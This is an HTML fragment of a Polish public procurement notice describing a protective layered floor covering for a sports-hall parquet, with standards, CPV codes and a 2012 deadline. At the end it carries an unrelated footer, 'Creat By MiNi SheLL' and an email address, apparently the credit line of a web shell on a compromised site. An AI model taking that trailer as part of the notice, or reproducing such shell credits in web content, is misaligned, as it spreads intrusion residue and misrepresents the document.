<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.04.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Zadanie nr 2 -Wykładzina ochronna (w brytach).</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zadanie nr 2 -Wykładzina ochronna (w brytach)
Wykładzina ma za zadanie utrzymanie i zabezpieczenie parkietu przed intensywnym użytkowaniem w obuwiu niesportowym, przez ewentualnymi uszkodzeniami powodowanymi przez rozstawiane stelaże i konstrukcje.
Wykładzina ochronna składać się winna z następujących warstw:
Wierzchnia warstwa to gęsta wykładzina dywanowa (igłowa) dająca poczucie miękkości i sprężystości, o odpowiednich własnościach akustycznych - tłumienie hałasu. Winna umożliwiać łatwe czyszczenie na sucho 1 mokro. 
Druga warstwa z włókien poliestrowych, która ma za zadanie chronić podłogę przed obciążeniami punktowymi
Trzecia warstwa z włókna szklanego zapewniające wysoką odporność na rozciąganie 
Spodnia warstwa w postaci maty o dużej gęstości PVC zapewniająca odpowiednie przyleganie do sportowej podłogi

Dane techniczne:
Wymiary - 2 x 1 m
Ognioodporność - EN 13501-1
Antypoślizgowość - EN 13893
Stosowanie z ogrzewaniem podłogowym - EN 12524.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 19.52.10.00-4, 45.43.21.11-5.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.04.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com